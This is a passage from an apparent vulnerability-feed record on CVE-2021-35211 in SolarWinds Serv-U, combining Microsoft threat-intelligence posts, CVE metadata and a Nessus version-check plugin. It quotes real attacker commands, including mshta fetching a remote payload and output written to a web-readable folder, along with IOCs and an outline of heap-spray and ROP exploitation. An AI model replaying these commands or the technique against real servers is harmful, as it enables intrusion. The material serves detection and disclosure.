SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>). The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U\u2019s implementation of the Secure Shell (SSH) protocol. If Serv-U\u2019s SSH is exposed to the internet, successful exploitation would give attackers ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker\u2019s follow-on malicious actions. [Microsoft Threat Experts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide>) customers who were affected were notified of attacker activity and were aided in responding to the attack.\n\nMicrosoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.\n\n## Who is DEV-0322?\n\nMSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d or \u201cDEV group\u201d and assigns each DEV group a unique number (DEV-####) for tracking purposes.\n\nMSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.\n\n## Attack details\n\nMSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from _Serv-U.exe_ include:\n\n * _C:\\Windows\\System32\\mshta.exe http://144[.]34[.]179[.]162/a_ (defanged)\n * _cmd.exe /c whoami > "./Client/Common/redacted.txt"_\n * _cmd.exe /c dir > ".\\Client\\Common\\redacted.txt"_\n * _cmd.exe /c ""C:\\Windows\\Temp\\Serv-U.bat""_\n * _powershell.exe C:\\Windows\\Temp\\Serv-U.bat_\n * _cmd.exe /c type \\\\\\redacted\\redacted.Archive > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\redacted.Archive"_\n\nWe observed DEV-0322 piping the output of their _cmd.exe_ commands to files in the Serv-U _\\Client\\Common\\ _folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new [global user](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted_ .Archive _file in the _Global Users_ directory. Serv-U user information is stored in these _.Archive _files.\n\nDue to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, _DebugSocketLog.txt_. The process could also crash after a malicious command was run.\n\nBy reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.\n\nTo protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a [targeted attack notification](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide#microsoft-threat-experts---targeted-attack-notification>), which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.\n\n## Detection guidance\n\nCustomers should review the Serv-U _DebugSocketLog.txt_ log file for exception messages like the line below. A _C0000005; CSUSSHSocket::ProcessReceive_ exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.\n\n`EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5`\n\nAdditional signs of potential compromise include:\n\n * Recent creation of_ .txt_ files in the Client\\Common\\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.\n * _Serv-U.exe_ spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for: \n * _mshta.exe_\n * _powershell.exe_\n * cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line: \n * _whoami_\n * _dir_\n * _./Client/Common_\n * _.\\Client\\Common_\n * _type [a file path] > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\\\[file name].Archive"_\n * Any process with any of the following in the command line: \n * _C:\\Windows\\Temp\\_\n * The addition of any unrecognized [global users](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in _C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users_, which appears to store the Global users information.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/Serv-U-console.png)\n\n### Detection details\n\n#### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Behavior:Win32/ServuSpawnSuspProcess.A\n * Behavior:Win32/ServuSpawnCmdClientCommon.A\n\n#### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:\n\n * Suspicious behavior by Serv-U.exe\n\n#### Azure Sentinel query\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/DEV-0322_SolarWinds_Serv-U_IOC.yaml>).\n\n### Indicators of compromise (IOCs)\n\n * 98[.]176[.]196[.]89\n * 68[.]235[.]178[.]32\n * 208[.]113[.]35[.]58\n * 144[.]34[.]179[.]162\n * 97[.]77[.]97[.]58\n * hxxp://144[.]34[.]179[.]162/a\n * C:\\Windows\\Temp\\Serv-U.bat\n * C:\\Windows\\Temp\\test\\current.dmp\n\nThe post [Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T22:30:17", "type": "mssecure", "title": "Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T22:30:17", "id": "MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2", "href": "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-02T16:25:01", "description": "Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributed the [attack](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures. In this blog, we share technical information about the vulnerability, tracked as [CVE-2021-35211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211>), that we shared with SolarWinds, who promptly released [security updates](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) to fix the vulnerability and mitigate the attacks.\n\nThis analysis was conducted by the Microsoft Offensive Research & Security Engineering team, a focused group tasked with supporting teams like MSTIC with exploit development expertise. Our team\u2019s remit is to make computing safer. We do this by leveraging our knowledge of attacker techniques and processes to build and improve protections in Windows and Azure through reverse engineering, attack creation and replication, vulnerability research, and intelligence sharing.\n\nIn early July, MSTIC provided our team with data that seemed to indicate exploit behavior against a newly-discovered vulnerability in the SolarWinds Serv-U FTP server\u2019s SSH component. Although the intel contained useful indicators, it lacked the exploit in question, so our team set out to reconstruct the exploit, which required to first find and understand the new vulnerability in the Serv-U SSH-related code.\n\nAs we knew this was a remote, pre-auth vulnerability, we quickly constructed a fuzzer focused on the pre-auth portions of the SSH handshake and noticed that the service captured and passed all access violations without terminating the process. It immediately became evident that the Serv-U process would make stealthy, reliable exploitation attempts simple to accomplish. We concluded that the exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context. This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages. Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation.\n\nWe shared these findings, as well as the fuzzer we created, with SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/en-us/msrc/msvr>) (MSVR), and worked with them to fix the issue. This is an example of intelligence sharing and industry collaboration that result in comprehensive protection for the broader community through detection of attacks through products and fixing vulnerabilities through security updates.\n\n### Vulnerability in Serv-U\u2019s implementation of SSH\n\nSecure Shell (SSH) is a widely adopted protocol for secure communications over an untrusted network. The protocol behavior is defined in multiple requests for comment (RFCs), and existing implementations are available in open-source code; we primarily used [RFC 4253](<https://datatracker.ietf.org/doc/html/rfc4253>), [RFC 4252](<https://datatracker.ietf.org/doc/html/rfc4252>), and [libssh](<https://git.libssh.org/projects/libssh.git/tree/>) as references for this analysis.\n\nThe implementation of SSH in Serv-U was found by enumerating references to the \u201cSSH-\u201c string, which must be present in the first data sent to the server. The most likely instance of such code was the following:\n\n![Screenshot of code showing instance of SSH](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig1-Serv-U-SSH-blog.png)\n\n_Figure 1. Promising instance of \u201cSSH-\u201d string_\n\nPutting a breakpoint on the above code and attempting to connect to Serv-U with an SSH client confirmed our hypothesis and resulted in the breakpoint being hit with the following call stack:\n\n![Screenshot of code showing call stack resulting from break point](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig2-Serv-U-SSH-blog.png)\n\n_Figure 2. The call stack resulting from a break point set on code in Figure 1._\n\nAt this point, we noticed that _Serv-U.dll_ and _RhinoNET.dll_ both have ASLR support disabled, making them prime locations for ROP gadgets, as any addresses within them will be constant across any server instances running on the internet for a given Serv-U version.\n\nAfter reversing related code in the _RhinoNET_ and _Serv-U_ DLLs, we could track SSH messages\u2019 paths as Serv-U processes them. To handle an incoming SSH connection, _Serv-U.dll_ creates a _CSUSSHSocket_ object, which is derived from the _RhinoNET!CRhinoSocket class_. The _CSUSSHSocket_ object lifetime is the length of the TCP connection\u2014it persists across possibly many individual TCP packets. The underlying _CRhinoSocket_ provides a buffered interface to the socket such that a single TCP packet may contain any number of bytes. This implies a single packet may include any number of SSH messages (provided they fit in the maximum buffer size), as well as partial SSH messages. The _CSUSSHSocket::ProcessRecvBuffer_ function is then responsible for parsing the SSH messages from the buffered socket data.\n\n_CSUSSHSocket::ProcessRecvBuffer_ begins by checking for the SSH version with _ParseBanner_. If _ParseBanner_ successfully parses the SSH version from the banner, _ProcessRecvBuffer_ then loops over _ParseMessage_, which obtains a pointer to the current message in the socket data and extracts the _msg_id_ and _length_ fields from the message (more on the _ParseMessage_ function later).\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig3-Serv-U-SSH-blog.png)\n\n_Figure 3. Selection of code from CSUSSHSocket::ProcessRecvBuffer processing loop_\n\nThe socket data being iterated over is conceptually an array of the pseudo-C structure _ssh_msg_t_, as seen below. The message data is contained within the payload buffer, the first byte of which is considered the _msg_id_:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig3a-Serv-U-SSH-blog.png)\n\n_ProcessRecvBuffer_ then dispatches handling of the message based on the _msg_id_. Some messages are handled directly from the message parsing loop, while others get passed to _ssh_pkt_others_, which posts the message to a queue for another thread to pick up and process.\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig4-Serv-U-SSH-blog.png)\n\n_Figure 4.Pre-auth reachable handlers in CSUSSHSocket::ProcessRecvBuffer_\n\nIf the _msg_id_ is deferred to the alternate thread, _CSSHSession::OnSSHMessage _processes it. This function mainly deals with messages that need to interact with Serv-U managed user profile data (e.g., authentication against per-user credentials) and UI updates. _CSSHSession::OnSSHMessage_ turned out to be uninteresting in terms of vulnerability hunting as most message handlers within it require successful user authentication (initial telemetry indicated this was a pre-authentication vulnerability), and no vulnerabilities were found in the remaining handlers.\n\nWhen initially running fuzzers against Serv-U with a debugger attached, it was evident that the application was catching exceptions which would normally crash a process (such as access violations), logging the error, modifying state just enough to avoid termination of the process, and then continuing as if there had been no problem. This behavior improves uptime of the file server application but also results in possible memory corruption lingering around in the process and building up over time. As an attacker, this grants opportunities like brute-forcing addresses of code or data with dynamic addresses.\n\nThis squashing of access violations assists with exploitation, but for fuzzing, we filtered out \u201cuninteresting\u201d exceptions generated by read/write access violations and let the fuzzer run until hitting a fault wherein RIP had been corrupted. This quickly resulted in the following crashing context:\n\n![Screenshot of Wndbg](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig5-Serv-U-SSH-blog.png)\n\n_Figure 5. WinDbg showing crashing context from fuzzer-generated SSH messages_\n\nAs seen above, _CRYPTO_ctr128_encrypt_ in _libeay32.dll_ (part of OpenSSL) attempted to call an invalid address. The version of OpenSSL used is 1.0.2u, so we obtained the [sources](<https://www.openssl.org/source/old/1.0.2/openssl-1.0.2u.tar.gz>) to peruse. The following shows the relevant OpenSSL function:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig5a-Serv-U-SSH-blog.png)\n\nMeanwhile, the following shows the structure that is passed:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig5b-Serv-U-SSH-blog.png)\n\nThe crashing function was reached from the OpenSSL API boundary via the following path: _EVP_EncryptUpdate_ -> _evp_EncryptDecryptUpdate_ -> _aes_ctr_cipher_ -> _CRYPTO_ctr128_encrypt_.\n\nLooking further up the call stack, it is evident that Serv-U calls _EVP_EncryptUpdate_ from _CSUSSHSocket::ParseMessage_, as seen below:\n\n![Screenshot of code showing location of SSL](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6-Serv-U-SSH-blog.png)\n\n_Figure 6. Location of call into OpenSSL, wherein attacker-controlled function pointer may be invoked_\n\nAt this point, we manually minimized the TCP packet buffer produced by the fuzzer until only the SSH messages required to trigger the crash remained. In notation like that used in the RFCs, the required SSH messages were:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6a-Serv-U-SSH-blog.png)\n\nNote that the following description references \u201cencrypt\u201d functions being called when the crashing code path is clearly attempting to decrypt a buffer. This is not an error: Serv-U uses the encrypt OpenSSL API and, while not optimal for code clarity, it is behaviorally correct since Advanced Encryption Standard (AES) is operating in counter (CTR) mode.\n\nAfter taking a Time Travel Debugging trace and debugging through the message processing sequence, we found that the root cause of the issue was that Serv-U initially creates the OpenSSL AES128-CTR context with code like the following:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6b-Serv-U-SSH-blog.png)\n\nCalling [_EVP_EncryptInit_ex_](<https://www.openssl.org/docs/man1.0.2/man3/EVP_EncryptInit_ex.html>) with NULL key and/or IV is valid, and Serv-U does so in this case because the context is created while handling the KEXINIT message, which is before key material is ready. However, AES key expansion is not performed until the key is set, and the data in the _ctx->cipher_data_ structure remains uninitialized until the key expansion is performed. We can (correctly) surmise that our sequence of messages to hit the crash has caused _enc_algo_client_to_server->decrypt_ to be called before the key material is initialized. The Serv-U KEXINIT handler creates objects for all parameters given in the message. However, the corresponding objects currently active for the connection are not replaced with the newly created ones until the following NEWKEYS message is processed. The client always completes the key exchange process In a normal SSH connection before issuing a NEWKEYS message. Serv-U processed NEWKEYS (thus setting the _m_bCipherActive_ flag and replacing the cipher objects) no matter the connection state or key exchange. From this, we can see that the last message type in our fuzzed sequence does not matter\u2014there only needs to be some data remaining to be processed in the socket buffer to trigger decryption after the partially initialized AES CTR cipher object has been activated.\n\n### Exploitation\n\nAs the vulnerability allows loading RIP from uninitialized memory and as there are some modules without ASLR in the process, exploitation is not so complicated: we can find a way to control the content of the uninitialized _cipher_data _structure, point the _cipher_data->block_ function pointer at some initial ROP gadget, and start a ROP chain. Because of the exception handler causing any fault to be ignored, we do not necessarily need to attain reliable code execution upon the first packet. It is possible to retry exploitation until code execution is successful, however this will leave traces in log files and as such it may be worthwhile to invest more effort into a different technique which would avoid logging.The first step is to find the size of the _cipher_data_ allocation, as the most direct avenue to prefill the buffer is to spray allocations of the target allocation size and free them before attempting to reclaim the address as _cipher_data. ctx->cipher_data_ is allocated and assigned in EVP_CipherInit_ex with the following line:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6c-Serv-U-SSH-blog.png)\n\nWith a debugger, we can see the _ctx_size_ in our case is _0x108_, and that this allocator winds up calling _ucrtbase!_malloc_base_. From previous reversing, we know that both _CRhinoSocket_ and _CSUSSHSocket_ levels of packet parsing call _operator new[]_ to allocate space to hold the packets we send. Luckily, that also winds up in _ucrtbase!_malloc_base_, using the same heap. Therefore, prefilling the target allocation is as simple as sending a properly sized TCP packet or SSH message and then closing the connection to ensure it is freed. Using this path to spray does not trigger other allocations of the same size, so we don\u2019t have to worry about polluting the heap.\n\nAnother important value to pull out of the debugger/disassembly is _offsetof(EVP_AES_KEY, block)_, as that offset in the sprayed data needs to be set to the initial ROP gadget. This value is _0xf8_. Conveniently, most of the rest of the _EVP_AES_KEY_ structure can be used for the ROP chain contents itself, and a pointer to the base of this structure exists in registers _rbx_, _r8_, and _r10_ at the time of the controlled function pointer call.\n\nAs a simple proof of concept, consider the following python code:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6d-Serv-U-SSH-blog.png)\n\nThe above results in the following context in the debugger:\n\n![Screenshot of code showing machine context](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig7-Serv-U-SSH-blog.png)\n\n_Figure 7. Machine context showing rcx, rdx, and rip controlled by attacker_\n\n### Conclusion: Responsible disclosure and industry collaboration improves security for all\n\nOur research shows that the Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration. An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported.\n\nWe shared our findings to SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD). We also shared the fuzzer we created. SolarWinds released an [advisory and security patch](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), which we strongly encourage customers to apply. If you are not sure if your system is affected, open a support case in the [SolarWinds Customer Portal](<https://customerportal.solarwinds.com/support/submit-a-ticket?sid=satsn>).\n\nIn addition to sharing vulnerability details and fuzzing tooling with SolarWinds, we also recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. Enabling ASLR is a simple compile-time flag which is enabled by default and has been available since Windows Vista. ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U.\n\nWe would like to thank SolarWinds for their prompt response. This case further underscores the need for constant collaboration among software vendors, security researchers, and other players to ensure the safety and security of users\u2019 computing experience.\n\n \n\n**_Microsoft Offensive Research & Security Engineering team_**\n\n \n\nThe post [A deep-dive into the SolarWinds Serv-U SSH vulnerability](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-02T16:00:56", "type": "mssecure", "title": "A deep-dive into the SolarWinds Serv-U SSH vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-02T16:00:56", "id": "MSSECURE:C6E199EAD7CE978C9F1B558F17746AFD", "href": "https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-07-13T16:47:13", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T21:15:00", "type": "cve", "title": "CVE-2021-35211", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:solarwinds:serv-u:15.2.3"], "id": "CVE-2021-35211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:solarwinds:serv-u:15.2.3:hotfix1:*:*:*:*:*:*", "cpe:2.3:a:solarwinds:serv-u:15.2.3:-:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2022-04-11T21:22:32", "description": "According to its banner, the installed version of Serv-U is a version prior to 15.2.3 Hotfix 2. It is, therefore, affected memory escape vulnerability. An unauthenticated remote attacker who successfully exploited this vulnerability could run arbitrary code with privileges, which could then install programs; view, change, or delete data; or run programs on the affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-07-15T00:00:00", "type": "nessus", "title": "Serv-U FTP Server <= 15.2.3 Hotfix 1 Memory Escape Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:solarwinds:serv-u_file_server"], "id": "SERVU_15_2_3_2.NASL", "href": "https://www.tenable.com/plugins/nessus/151646", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151646);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-35211\");\n script_xref(name:\"IAVA\", value:\"2021-A-0322-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Serv-U FTP Server <= 15.2.3 Hotfix 1 Memory Escape Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by an Memory Escape vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the installed version of Serv-U is a version prior to 15.2.3 Hotfix 2. It is, therefore, \naffected memory escape vulnerability. An unauthenticated remote attacker who successfully exploited this vulnerability \ncould run arbitrary code with privileges, which could then install programs; view, change, or delete data; or run \nprograms on the affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ebb78655\");\n # https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-2-3-HotFix-2?language=en_US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1a78dfac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ServU-FTP 15.2.3 Hotfix 2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35211\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:solarwinds:serv-u_file_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"servu_version.nasl\");\n script_require_keys(\"installed_sw/Serv-U\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('ftp_func.inc');\n\nvar port = get_ftp_port(default:21);\n\nvar app_info = vcf::get_app_info(app:'Serv-U', port:port);\n\nvar constraints = [\n {'fixed_version' : '15.2.3.742' , 'fixed_display' : '15.2.3.742 HF2'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-07-03T20:03:52", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 12, 2021 